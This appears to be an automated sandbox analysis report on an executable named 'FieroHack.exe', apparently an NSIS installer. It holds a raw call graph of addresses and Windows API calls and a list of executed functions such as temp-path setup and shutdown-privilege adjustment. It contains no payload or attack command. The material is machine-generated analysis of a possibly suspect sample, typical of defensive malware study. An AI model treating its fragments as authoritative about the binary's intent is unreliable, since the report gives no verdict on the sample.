3945->3944 3946->3949 3947 404dbf GetWindowLongA SetWindowLongA 3951 404dd8 3947->3951 3957 404f71 SendMessageA 3948->3957 3949->3941 3967 405001 3949->3967 3979 404b4e 3949->3979 3950->3963 3953 404df5 3951->3953 3954 404ddd ShowWindow 3951->3954 3952->3947 3956 404d37 SendMessageA 3952->3956 3958 404dba 3952->3958 3960 404d75 SendMessageA 3952->3960 3961 404d89 SendMessageA 3952->3961 3973 4041b0 SendMessageA 3953->3973 3972 4041b0 SendMessageA 3954->3972 3956->3952 3957->3927 3958->3947 3958->3951 3960->3952 3961->3952 3963->3939 3964 40510b 3965 405115 InvalidateRect 3964->3965 3968 405121 3964->3968 3965->3968 3966 40502f SendMessageA 3969 405045 3966->3969 3967->3966 3967->3969 3968->3941 3988 404a89 3968->3988 3969->3964 3971 4050b9 SendMessageA SendMessageA 3969->3971 3971->3969 3972->3963 3973->3928 3975 404af1 GetMessagePos ScreenToClient SendMessageA 3974->3975 3976 404b2d SendMessageA 3974->3976 3977 404b25 3975->3977 3978 404b2a 3975->3978 3976->3977 3977->3932 3978->3976 3991 4060f7 lstrcpynA 3979->3991 3981 404b61 3992 406055 wsprintfA 3981->3992 3983 404b6b 3984 40140b 2 API calls 3983->3984 3985 404b74 3984->3985 3993 4060f7 lstrcpynA 3985->3993 3987 404b7b 3987->3967 3994 4049c4 3988->3994 3990 404a9e 3990->3941 3991->3981 3992->3983 3993->3987 3995 4049da 3994->3995 3996 40618a 17 API calls 3995->3996 3997 404a3e 3996->3997 3998 40618a 17 API calls 3997->3998 3999 404a49 3998->3999 4000 40618a 17 API calls 3999->4000 4001 404a5f lstrlenA wsprintfA SetDlgItemTextA 4000->4001 4001->3990 4002 401502 4003 40150a 4002->4003 4005 40151d 4002->4005 4004 402bac 17 API calls 4003->4004 4004->4005 4006 402604 4007 402bce 17 API calls 4006->4007 4008 40260b 4007->4008 4011 405c90 GetFileAttributesA CreateFileA 4008->4011 4010 402617 4011->4010 4012 401b87 4013 401b94 4012->4013 4014 401bd8 4012->4014 4015 401c1c 4013->4015 4020 401bab 4013->4020 4016 401c01 GlobalAlloc 4014->4016 4017 401bdc 4014->4017 4018 40618a 17 API calls 4015->4018 4026 402387 4015->4026 4019 40618a 17 API calls 4016->4019 4017->4026 4033 4060f7 lstrcpynA 4017->4033 4022 402381 4018->4022 4019->4015 4031 4060f7 lstrcpynA 4020->4031 4027 405813 MessageBoxIndirectA 4022->4027 4024 401bee GlobalFree 4024->4026 4025 401bba 4032 4060f7 lstrcpynA 4025->4032 4027->4026 4029 401bc9 4034 4060f7 lstrcpynA 4029->4034 4031->4025 4032->4029 4033->4024 4034->4026 4035 402588 4045 402c0e 4035->4045 4038 402bac 17 API calls 4039 40259b 4038->4039 4040 4027bf 4039->4040 4041 4025c2 RegEnumValueA 4039->4041 4042 4025b6 RegEnumKeyA 4039->4042 4043 4025d7 RegCloseKey 4041->4043 4042->4043 4043->4040 4046 402bce 17 API calls 4045->4046 4047 402c25 4046->4047 4048 405f7d RegOpenKeyExA 4047->4048 4049 402592 4048->4049 4049->4038 3418 401389 3420 401390 3418->3420 3419 4013fe 3420->3419 3421 4013cb MulDiv SendMessageA 3420->3421 3421->3420 4050 40460d 4051 404639 4050->4051 4052 40464a 4050->4052 4111 4057f7 GetDlgItemTextA 4051->4111 4054 404656 GetDlgItem 4052->4054 4087 4046b5 4052->4087 4058 40466a 4054->4058 4055 404644 4057 4063d2 5 API calls 4055->4057 4056 404799 4059 404943 4056->4059 4113 4057f7 GetDlgItemTextA 4056->4113 4057->4052 4061 40467e SetWindowTextA 4058->4061 4066 405b28 4 API calls 4058->4066 4065 4041e2 8 API calls 4059->4065 4064 40417b 18 API calls 4061->4064 4062 4047c9 4067 405b7d 18 API calls 4062->4067 4063 40618a 17 API calls 4068 404729 SHBrowseForFolderA 4063->4068 4069 40469a 4064->4069 4070 404957 4065->4070 4071 404674 4066->4071 4072 4047cf 4067->4072 4068->4056 4073 404741 CoTaskMemFree 4068->4073 4074 40417b 18 API calls 4069->4074 4071->4061 4075 405a8f 3 API calls 4071->4075 4114 4060f7 lstrcpynA 4072->4114 4076 405a8f 3 API calls 4073->4076 4077 4046a8 4074->4077 4075->4061 4078 40474e 4076->4078 4112 4041b0 SendMessageA 4077->4112 4081 404785 SetDlgItemTextA 4078->4081 4086 40618a 17 API calls 4078->4086 4081->4056 4082 4046ae 4084 406500 5 API calls 4082->4084 4083 4047e6 4085 406500 5 API calls 4083->4085 4084->4087 4094 4047ed 4085->4094 4088 40476d lstrcmpiA 4086->4088 4087->4056 4087->4059 4087->4063 4088->4081 4091 40477e lstrcatA 4088->4091 4089 404829 4115 4060f7 lstrcpynA 4089->4115 4091->4081 4092 404830 4093 405b28 4 API calls 4092->4093 4095 404836 GetDiskFreeSpaceA 4093->4095 4094->4089 4097 405ad6 2 API calls 4094->4097 4099 404881 4094->4099 4098 40485a MulDiv 4095->4098 4095->4099 4097->4094 4098->4099 4100 4048f2 4099->4100 4101 404a89 20 API calls 4099->4101 4102 404915 4100->4102 4103 40140b 2 API calls 4100->4103 4104 4048df 4101->4104 4116 40419d EnableWindow 4102->4116 4103->4102 4106 4048f4 SetDlgItemTextA 4104->4106 4107 4048e4 4104->4107 4106->4100 4109 4049c4 20 API calls 4107->4109 4108 404931 4108->4059 4110 404566 SendMessageA 4108->4110 4109->4100 4110->4059 4111->4055 4112->4082 4113->4062 4114->4083 4115->4092 4116->4108 4117 401490 4118 40521e 24 API calls 4117->4118 4119 401497 4118->4119 4120 405192 4121 4051a2 4120->4121 4122 4051b6 4120->4122 4124 4051ff 4121->4124 4125 4051a8 4121->4125 4123 4051be IsWindowVisible 4122->4123 4131 4051d5 4122->4131 4123->4124 4126 4051cb 4123->4126 4127 405204 CallWindowProcA 4124->4127 4128 4041c7 SendMessageA 4125->4128 4130 404ace 5 API calls 4126->4130 4129 4051b2 4127->4129 4128->4129 4130->4131 4131->4127 4132 404b4e 4 API calls 4131->4132 4132->4124 4133 402516 4134 402c0e 17 API calls 4133->4134 4135 402520 4134->4135 4136 402bce 17 API calls 4135->4136 4137 402529 4136->4137 4138 402533 RegQueryValueExA 4137->4138 4142 4027bf 4137->4142 4139 402559 RegCloseKey 4138->4139 4140 402553 4138->4140 4139->4142 4140->4139 4144 406055 wsprintfA 4140->4144 4144->4139 4145 40239c 4146 4023a4 4145->4146 4147 4023aa 4145->4147 4148 402bce 17 API calls 4146->4148 4149 402bce 17 API calls 4147->4149 4151 4023ba 4147->4151 4148->4147 4149->4151 4150 4023c8 4153 402bce 17 API calls 4150->4153 4151->4150 4152 402bce 17 API calls 4151->4152 4152->4150 4154 4023d1 WritePrivateProfileStringA 4153->4154 4155 40149d 4156 402387 4155->4156 4157 4014ab PostQuitMessage 4155->4157 4157->4156 4158 40159d 4159 402bce 17 API calls 4158->4159 4160 4015a4 SetFileAttributesA 4159->4160 4161 4015b6 4160->4161 4162 40209d 4163 40215d 4162->4163 4164 4020af 4162->4164 4167 401423 24 API calls 4163->4167 4165 402bce 17 API calls 4164->4165 4166 4020b6 4165->4166 4168 402bce 17 API calls 4166->4168 4172 4022e2 4167->4172 4169 4020bf 4168->4169 4170 4020d4 LoadLibraryExA 4169->4170 4171 4020c7 GetModuleHandleA 4169->4171 4170->4163 4173 4020e4 GetProcAddress 4170->4173 4171->4170 4171->4173 4174 402130 4173->4174 4175 4020f3 4173->4175 4176 40521e 24 API calls 4174->4176 4177 402103 4175->4177 4178 401423 24 API calls 4175->4178 4176->4177 4177->4172 4179 402151 FreeLibrary 4177->4179 4178->4177 4179->4172 4180 401a1e 4181 402bce 17 API calls 4180->4181 4182 401a27 ExpandEnvironmentStringsA 4181->4182 4183 401a3b 4182->4183 4185 401a4e 4182->4185 4184 401a40 lstrcmpA 4183->4184 4183->4185 4184->4185 4191 40171f 4192 402bce 17 API calls 4191->4192 4193 401726 SearchPathA 4192->4193 4194 401741 4193->4194 4195 401d1f 4196 402bac 17 API calls 4195->4196 4197 401d26 4196->4197 4198 402bac 17 API calls 4197->4198 4199 401d32 GetDlgItem 4198->4199 4200 402620 4199->4200 4201 402421 4202 402453 4201->4202 4203 402428 4201->4203 4204 402bce 17 API calls 4202->4204 4205 402c0e 17 API calls 4203->4205 4206 40245a 4204->4206 4207 40242f 4205->4207 4212 402c8c 4206->4212 4209 402467 4207->4209 4210 402bce 17 API calls 4207->4210 4211 402440 RegDeleteValueA RegCloseKey 4210->4211 4211->4209 4213 402c98 4212->4213 4214 402c9f 4212->4214 4213->4209 4214->4213 4216 402cd0 4214->4216 4217 405f7d RegOpenKeyExA 4216->4217 4219 402cfe 4217->4219 4218 402da8 4218->4213 4219->4218 4220 402d0e RegEnumValueA 4219->4220 4224 402d31 4219->4224 4221 402d98 RegCloseKey 4220->4221 4220->4224 4221->4218 4222 402d6d RegEnumKeyA 4223 402d76 RegCloseKey 4222->4223 4222->4224 4225 406500 5 API calls 4223->4225 4224->4221 4224->4222 4224->4223 4227 402cd0 6 API calls 4224->4227 4226 402d86 4225->4226 4226->4218 4228 402d8a RegDeleteKeyA 4226->4228 4227->4224 4228->4218 4229 4027a1 4230 402bce 17 API calls 4229->4230 4231 4027a8 FindFirstFileA 4230->4231 4232 4027cb 4231->4232 4236 4027bb 4231->4236 4233 4027d2 4232->4233 4237 406055 wsprintfA 4232->4237 4238 4060f7 lstrcpynA 4233->4238 4237->4233 4238->4236 4239 402626 4240 40262b 4239->4240 4241 40263f 4239->4241 4242 402bac 17 API calls 4240->4242 4243 402bce 17 API calls 4241->4243 4245 402634 4242->4245 4244 402646 lstrlenA 4243->4244 4244->4245 4246 402668 4245->4246 4247 405d37 WriteFile 4245->4247 4247->4246 4248 403ca7 4249 403dfa 4248->4249 4250 403cbf 4248->4250 4252 403e4b 4249->4252 4253 403e0b GetDlgItem GetDlgItem 4249->4253 4250->4249 4251 403ccb 4250->4251 4254 403cd6 SetWindowPos 4251->4254 4255 403ce9 4251->4255 4257 403ea5 4252->4257 4265 401389 2 API calls 4252->4265 4256 40417b 18 API calls 4253->4256 4254->4255 4259 403d06 4255->4259 4260 403cee ShowWindow 4255->4260 4261 403e35 SetClassLongA 4256->4261 4258 4041c7 SendMessageA 4257->4258 4278 403df5 4257->4278 4287 403eb7 4258->4287 4262 403d28 4259->4262 4263 403d0e DestroyWindow 4259->4263 4260->4259 4264 40140b 2 API calls 4261->4264 4266 403d2d SetWindowLongA 4262->4266 4267 403d3e 4262->4267 4316 404104 4263->4316 4264->4252 4268 403e7d 4265->4268 4266->4278 4271 403db5 4267->4271 4272 403d4a GetDlgItem 4267->4272 4268->4257 4273 403e81 SendMessageA 4268->4273 4269 40140b 2 API calls 4269->4287 4270 404106 DestroyWindow EndDialog 4270->4316 4274 4041e2 8 API calls 4271->4274 4276 403d7a 4272->4276 4277 403d5d SendMessageA IsWindowEnabled 4272->4277 4273->4278 4274->4278 4275 404135 ShowWindow 4275->4278 4280 403d87 4276->4280 4281 403dce SendMessageA 4276->4281 4282 403d9a 4276->4282 4290 403d7f 4276->4290 4277->4276 4277->4278 4279 40618a 17 API calls 4279->4287 4280->4281 4280->4290 4281->4271 4285 403da2 4282->4285 4286 403db7 4282->4286 4283 404154 SendMessageA 4283->4271 4284 40417b 18 API calls 4284->4287 4288 40140b 2 API calls 4285->4288 4289 40140b 2 API calls 4286->4289 4287->4269 4287->4270 4287->4278 4287->4279 4287->4284 4291 40417b 18 API calls 4287->4291 4307 404046 DestroyWindow 4287->4307 4288->4290 4289->4290 4290->4271 4290->4283 4292 403f32 GetDlgItem 4291->4292 4293 403f47 4292->4293 4294 403f4f ShowWindow EnableWindow 4292->4294 4293->4294 4317 40419d EnableWindow 4294->4317 4296 403f79 EnableWindow 4301 403f8d 4296->4301 4297 403f92 GetSystemMenu EnableMenuItem SendMessageA 4298 403fc2 SendMessageA 4297->4298 4297->4301 4298->4301 4300 403c88 18 API calls 4300->4301 4301->4297 4301->4300 4318 4041b0 SendMessageA 4301->4318 4319 4060f7 lstrcpynA 4301->4319 4303 403ff1 lstrlenA 4304 40618a 17 API calls 4303->4304 4305 404002 SetWindowTextA 4304->4305 4306 401389 2 API calls 4305->4306 4306->4287 4308 404060 CreateDialogParamA 4307->4308 4307->4316 4309 404093 4308->4309 4308->4316 4310 40417b 18 API calls 4309->4310 4311 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4310->4311 4312 401389 2 API calls 4311->4312 4313 4040e4 4312->4313 4313->4278 4314 4040ec ShowWindow 4313->4314 4315 4041c7 SendMessageA 4314->4315 4315->4316 4316->4275 4316->4278 4317->4296 4318->4301 4319->4303 4320 40272b 4321 402732 4320->4321 4323 4029aa 4320->4323 4322 402bac 17 API calls 4321->4322 4324 402739 4322->4324 4325 402748 SetFilePointer 4324->4325 4325->4323 4326 402758 4325->4326 4328 406055 wsprintfA 4326->4328 4328->4323 4329 401c2e 4330 402bac 17 API calls 4329->4330 4331 401c35 4330->4331 4332 402bac 17 API calls 4331->4332 4333 401c42 4332->4333 4334 402bce 17 API calls 4333->4334 4338 401c57 4333->4338 4334->4338 4335 401c67 4336 401c72 4335->4336 4337 401cbe 4335->4337 4340 402bac 17 API calls 4336->4340 4341 402bce 17 API calls 4337->4341 4338->4335 4339 402bce 17 API calls 4338->4339 4339->4335 4342 401c77 4340->4342 4343 401cc3 4341->4343 4344 402bac 17 API calls 4342->4344 4345 402bce 17 API calls 4343->4345 4346 401c83 4344->4346 4347 401ccc FindWindowExA 4345->4347 4348 401c90 SendMessageTimeoutA 4346->4348 4349 401cae SendMessageA 4346->4349 4350 401cea 4347->4350 4348->4350 4349->4350 2884 403830 2885 403848 2884->2885 2886 40383a CloseHandle 2884->2886 2891 403875 2885->2891 2886->2885 2892 403883 2891->2892 2893 403888 FreeLibrary GlobalFree 2892->2893 2894 40384d 2892->2894 2893->2893 2893->2894 2895 4058bf 2894->2895 2932 405b7d 2895->2932 2898 4058e7 DeleteFileA 2900 403859 2898->2900 2899 4058fe 2901 405a2c 2899->2901 2947 4060f7 lstrcpynA 2899->2947 2901->2900 2980 40646b FindFirstFileA 2901->2980 2903 405924 2904 405937 2903->2904 2905 40592a lstrcatA 2903->2905 2948 405ad6 lstrlenA 2904->2948 2906 40593d 2905->2906 2909 40594b lstrcatA 2906->2909 2911 405956 lstrlenA FindFirstFileA 2906->2911 2909->2911 2911->2901 2928 40597a 2911->2928 2915 405877 5 API calls 2916 405a66 2915->2916 2917 405a80 2916->2917 2918 405a6a 2916->2918 2920 40521e 24 API calls 2917->2920 2918->2900 2922 40521e 24 API calls 2918->2922 2920->2900 2921 405a0b FindNextFileA 2923 405a23 FindClose 2921->2923 2921->2928 2924 405a77 2922->2924 2923->2901 2925 405ed6 36 API calls 2924->2925 2925->2900 2927 4058bf 60 API calls 2927->2928 2928->2921 2928->2927 2929 40521e 24 API calls 2928->2929 2952 405aba 2928->2952 2956 4060f7 lstrcpynA 2928->2956 2957 405877 2928->2957 2965 40521e 2928->2965 2976 405ed6 MoveFileExA 2928->2976 2929->2921 2986 4060f7 lstrcpynA 2932->2986 2934 405b8e 2987 405b28 CharNextA CharNextA 2934->2987 2937 4058df 2937->2898 2937->2899 2940 405bcf lstrlenA 2941 405bda 2940->2941 2944 405bb7 2940->2944 2943 405a8f 3 API calls 2941->2943 2942 40646b 2 API calls 2942->2944 2945 405bdf GetFileAttributesA 2943->2945 2944->2937 2944->2940 2944->2942 2946 405ad6 2 API calls 2944->2946 2945->2937 2946->2940 2947->2903 2949 405ae3 2948->2949 2950 405af4 2949->2950 2951 405ae8 CharPrevA 2949->2951 2950->2906 2951->2949 2951->2950 2953 405ac0 2952->2953 2954 405ad3 2953->2954 2955 405ac6 CharNextA 2953->2955 2954->2928 2955->2953 2956->2928 3002 405c6b GetFileAttributesA 2957->3002 2960 4058a4 2960->2928 2961 405892 RemoveDirectoryA 2963 4058a0 2961->2963 2962 40589a DeleteFileA 2962->2963 2963->2960 2964 4058b0 SetFileAttributesA 2963->2964 2964->2960 2966 4052dc 2965->2966 2967 405239 2965->2967 2966->2928 2968 405256 lstrlenA 2967->2968 3005 40618a 2967->3005 2970 405264 lstrlenA 2968->2970 2971 40527f 2968->2971 2970->2966 2972 405276 lstrcatA 2970->2972 2973 405292 2971->2973 2974 405285 SetWindowTextA 2971->2974 2972->2971 2973->2966 2975 405298 SendMessageA SendMessageA SendMessageA 2973->2975 2974->2973 2975->2966 2977 405eea 2976->2977 2979 405ef7 2976->2979 3034 405d66 2977->3034 2979->2928 2981 406481 FindClose 2980->2981 2982 405a50 2980->2982 2981->2982 2982->2900 2983 405a8f lstrlenA CharPrevA 2982->2983 2984 405a5a 2983->2984 2985 405aa9 lstrcatA 2983->2985 2984->2915 2985->2984 2986->2934 2988 405b43 2987->2988 2992 405b53 2987->2992 2989 405b4e CharNextA 2988->2989 2988->2992 2990 405b73 2989->2990 2990->2937 2993 4063d2 2990->2993 2991 405aba CharNextA 2991->2992 2992->2990 2992->2991 3000 4063de 2993->3000 2994 406446 2995 40644a CharPrevA 2994->2995 2998 405ba4 2994->2998 2995->2994 2996 40643b CharNextA 2996->2994 2996->3000 2997 405aba CharNextA 2997->3000 2998->2937 2998->2944 2999 406429 CharNextA 2999->3000 3000->2994 3000->2996 3000->2997 3000->2999 3001 406436 CharNextA 3000->3001 3001->2996 3003 405883 3002->3003 3004 405c7d SetFileAttributesA 3002->3004 3003->2960 3003->2961 3003->2962 3004->3003 3006 406197 3005->3006 3007 4063b9 3006->3007 3010 406393 lstrlenA 3006->3010 3012 40618a 10 API calls 3006->3012 3015 4062af GetSystemDirectoryA 3006->3015 3016 4062c2 GetWindowsDirectoryA 3006->3016 3017 4063d2 5 API calls 3006->3017 3018 40618a 10 API calls 3006->3018 3019 40633c lstrcatA 3006->3019 3020 4062f6 SHGetSpecialFolderLocation 3006->3020 3022 405fde 3006->3022 3027 406055 wsprintfA 3006->3027 3028 4060f7 lstrcpynA 3006->3028 3008 4063ce 3007->3008 3029 4060f7 lstrcpynA 3007->3029 3008->2968 3010->3006 3012->3010 3015->3006 3016->3006 3017->3006 3018->3006 3019->3006 3020->3006 3021 40630e SHGetPathFromIDListA CoTaskMemFree 3020->3021 3021->3006 3030 405f7d 3022->3030 3025 406012 RegQueryValueExA RegCloseKey 3026 406041 3025->3026 3026->3006 3027->3006 3028->3006 3029->3008 3031 405f8c 3030->3031 3032 405f90 3031->3032 3033 405f95 RegOpenKeyExA 3031->3033 3032->3025 3032->3026 3033->3032 3035 405db2 GetShortPathNameA 3034->3035 3036 405d8c 3034->3036 3038 405ed1 3035->3038 3039 405dc7 3035->3039 3061 405c90 GetFileAttributesA CreateFileA 3036->3061 3038->2979 3039->3038 3041 405dcf wsprintfA 3039->3041 3040 405d96 CloseHandle GetShortPathNameA 3040->3038 3042 405daa 3040->3042 3043 40618a 17 API calls 3041->3043 3042->3035 3042->3038 3044 405df7 3043->3044 3062 405c90 GetFileAttributesA CreateFileA 3044->3062 3046 405e04 3046->3038 3047 405e13 GetFileSize GlobalAlloc 3046->3047 3048 405e35 3047->3048 3049 405eca CloseHandle 3047->3049 3063 405d08 ReadFile 3048->3063 3049->3038 3054 405e54 lstrcpyA 3057 405e76 3054->3057 3055 405e68 3056 405bf5 4 API calls 3055->3056 3056->3057 3058 405ead SetFilePointer 3057->3058 3070 405d37 WriteFile 3058->3070 3061->3040 3062->3046 3064 405d26 3063->3064 3064->3049 3065 405bf5 lstrlenA 3064->3065 3066 405c36 lstrlenA 3065->3066 3067 405c3e 3066->3067 3068 405c0f lstrcmpiA 3066->3068 3067->3054 3067->3055 3068->3067 3069 405c2d CharNextA 3068->3069 3069->3066 3071 405d55 GlobalFree 3070->3071 3071->3049 4351 4042b1 lstrcpynA lstrlenA 4358 401e35 GetDC 4359 402bac 17 API calls 4358->4359 4360 401e47 GetDeviceCaps MulDiv ReleaseDC 4359->4360 4361 402bac 17 API calls 4360->4361 4362 401e78 4361->4362 4363 40618a 17 API calls 4362->4363 4364 401eb5 CreateFontIndirectA 4363->4364 4365 402620 4364->4365 4366 402a35 SendMessageA 4367 402a5a 4366->4367 4368 402a4f InvalidateRect 4366->4368 4368->4367 4369 4014b7 4370 4014bd 4369->4370 4371 401389 2 API calls 4370->4371 4372 4014c5 4371->4372 4373 402dba 4374 402dc9 SetTimer 4373->4374 4376 402de2 4373->4376 4374->4376 4375 402e37 4376->4375 4377 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4376->4377 4377->4375 3443 4015bb 3444 402bce 17 API calls 3443->3444 3445 4015c2 3444->3445 3446 405b28 4 API calls 3445->3446 3459 4015ca 3446->3459 3447 401624 3449 401652 3447->3449 3450 401629 3447->3450 3448 405aba CharNextA 3448->3459 3452 401423 24 API calls 3449->3452 3463 401423 3450->3463 3455 40164a 3452->3455 3454 405761 2 API calls 3454->3459 3457 40577e 5 API calls 3457->3459 3458 40163b SetCurrentDirectoryA 3458->3455 3459->3447 3459->3448 3459->3454 3459->3457 3460 4015f3 3459->3460 3461 40160c GetFileAttributesA 3459->3461 3460->3459 3462 4056e4 4 API calls 3460->3462 3461->3459 3462->3460 3464 40521e 24 API calls 3463->3464 3465 401431 3464->3465 3466 4060f7 lstrcpynA 3465->3466 3466->3458 4378 4016bb 4379 402bce 17 API calls 4378->4379 4380 4016c1 GetFullPathNameA 4379->4380 4381 4016d8 4380->4381 4387 4016f9 4380->4387 4384 40646b 2 API calls 4381->4384 4381->4387 4382 402a5a 4383 40170d GetShortPathNameA 4383->4382 4385 4016e9 4384->4385 4385->4387 4388 4060f7 lstrcpynA 4385->4388 4387->4382 4387->4383 4388->4387

                                                    Executed Functions

                                                    Function 00403348 Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 366stringcomfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 3 40339f-4033b2 call 406492 lstrlenA 2->3 9 4033b4-4033d0 call 406500 * 3 3->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 40 4035b4-4035ce DeleteFileA call 402ea1 33->40 41 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->41 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 57 403524 37->57 43 4034a5-4034d2 38->43 44 40348f-403495 38->44 59 403662-403672 ExitProcess OleUninitialize 40->59 60 4035d4-4035da 40->60 41->40 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 41->58 46 4034d4-4034da 43->46 47 4034e5-403513 43->47 50 403497-403499 44->50 51 40349b 44->51 53 4034e0 46->53 54 4034dc-4034de 46->54 47->37 55 403531-40353d call 4060f7 47->55 50->43 50->51 51->43 53->47 54->47 54->53 55->33 57->28 58->40 58->59 65 403796-40379c 59->65 66 403678-403688 call 405813 ExitProcess 59->66 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 75 40365e 63->75 81 4035e9-403612 64->81 82 40361d-403627 64->82 67 403818-403820 65->67 68 40379e-4037b7 GetCurrentProcess OpenProcessToken 65->68 77 403822 67->77 78 403826-40382a ExitProcess 67->78 73 4037e9-4037f7 call 406500 68->73 74 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 68->74 89 403805-40380f ExitWindowsEx 73->89 90 4037f9-403803 73->90 74->73 75->59 77->78 86 403614-403616 81->86 83 403629-403636 call 405b7d 82->83 84 40368e-4036a2 call 40577e lstrcatA 82->84 83->59 97 403638-40364e call 4060f7 * 2 83->97 95 4036a4-4036aa lstrcatA 84->95 96 4036af-4036c9 lstrcatA lstrcmpiA 84->96 86->82 91 403618-40361b 86->91 89->67 94 403811-403813 call 40140b 89->94 90->89 90->94 91->82 91->86 94->67 95->96 96->59 100 4036cb-4036ce 96->100 97->63 102 4036d0-4036d5 call 4056e4 100->102 103 4036d7 call 405761 100->103 110 4036dc-4036e9 SetCurrentDirectoryA 102->110 103->110 111 4036f6-40371e call 4060f7 110->111 112 4036eb-4036f1 call 4060f7 110->112 116 403724-403740 call 40618a DeleteFileA 111->116 112->111 119 403781-403788 116->119 120 403742-403752 CopyFileA 116->120 119->116 122 40378a-403791 call 405ed6 119->122 120->119 121 403754-403774 call 405ed6 call 40618a call 405796 120->121 121->119 131 403776-40377d CloseHandle 121->131 122->59 131->119
                                                    APIs
                                                    • SetErrorMode.KERNELBASE ref: 0040336D
                                                    • GetVersion.KERNEL32 ref: 00403373
                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                    • OleInitialize.OLE32(00000000), ref: 004033E9
                                                    • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                    • GetCommandLineA.KERNEL32(0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\FieroHack.exe",00000020,"C:\Users\user\Desktop\FieroHack.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                      • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403924
                                                      • Part of subcall function 0040390A: lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                      • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                      • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                      • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403A61
                                                      • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662
                                                      • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                    • ExitProcess.KERNEL32 ref: 00403688
                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                    • ExitProcess.KERNEL32 ref: 0040382A
                                                      • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
